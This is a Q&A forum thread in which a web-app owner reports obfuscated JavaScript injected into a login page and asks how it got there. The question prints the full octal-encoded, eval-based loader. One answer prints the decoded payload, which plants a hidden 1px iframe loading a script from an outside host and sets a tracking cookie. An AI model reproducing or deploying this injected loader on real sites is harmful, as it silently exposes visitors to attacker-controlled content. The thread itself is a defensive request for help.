# Malicious javascript injected into login page

Tags: javascript, code-injection

I have a small web app that's written using CodeIgniter.  However, I discovered recently that someone injected some javascript into my app's login page.  When I look at the remote server's template file, the javascript is not there, but when I view the source in Chrome, I see the Javscript snippet below:

```
a = ("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,163,163,154,165,146,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,163,163,154,165,146,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,160,150,162,151,167,147,163,166,170,62,146,155,176,63,165,146,74,176,130,73,164,173,62,164,154,164,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,163,163,154,165,146,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,163,163,154,165,146,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,163,163,154,165,146,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,163,163,154,165,146,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16" ["split"](","));
ss = eval("Str" + "ing");
d = document;
for (i = 0; i < a.length; i += 1) {
    a[i] = parseInt(a[i], 8) - (7 - 3);
}
try {
    d.body++
} catch (q) {
    zz = 0;
}
try {
    zz &= 2
} catch (q) {
    zz = 1;
}
if (!zz)
    if (window["document"]) eval(ss["fromCharCode"].apply(ss, a));
```

When I run my web app locally, I don't see this snippet so it's obvious that my remote server has been compromised.

**EDIT:**

After looking into the code, I realized the array contains a large series of characters used to build the actual code. As elclanrs pointed out, it seems the code tracks the user with a malicious cookie.

**So my question is how does one manage to inject this type of code into my login page?**  I view the template file and the snippet is nowhere to be found, so I have no idea how to remove it from my page.

Comment: The code snipped would be easiaer to read, if you PrettyPrinted it.

Answer (score 1):

Seems to be setting a malicious cookie:

```
function zzzfff() {
  var oohqb = document.createElement('iframe');

  oohqb.src = 'http://ldnescort.biz/qb8zT7pw.php';
  oohqb.style.position = 'absolute';
  oohqb.style.border = '0';
  oohqb.style.height = '1px';
  oohqb.style.width = '1px';
  oohqb.style.left = '1px';
  oohqb.style.top = '1px';

  if (!document.getElementById('oohqb')) {
    document.write('<div id=\'oohqb\'></div>');
    document.getElementById('oohqb').appendChild(oohqb);
  }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0) nDays = 1;
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
  var start = document.cookie.indexOf(name + "=");
  var len = start + name.length + 1;
  if ((!start) &&
    (name != document.cookie.substring(0, name.length))) {
    return null;
  }
  if (start == -1) return null;
  var end = document.cookie.indexOf(";", len);
  if (end == -1) end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
  if (GetCookie('visited_uq') == 55) {} else {
    SetCookie('visited_uq', '55', '1', '/');
    zzzfff();
  }
}
```

Answer (score 0):

Google how to sanitize input. For example, one should not be able to input the character `<`: if he does, you should replace it with `&lt;`, which is the corresponding HTML entity.
With the data you gave, I can't really tell how this was injected: remove the injection loading a previous backup.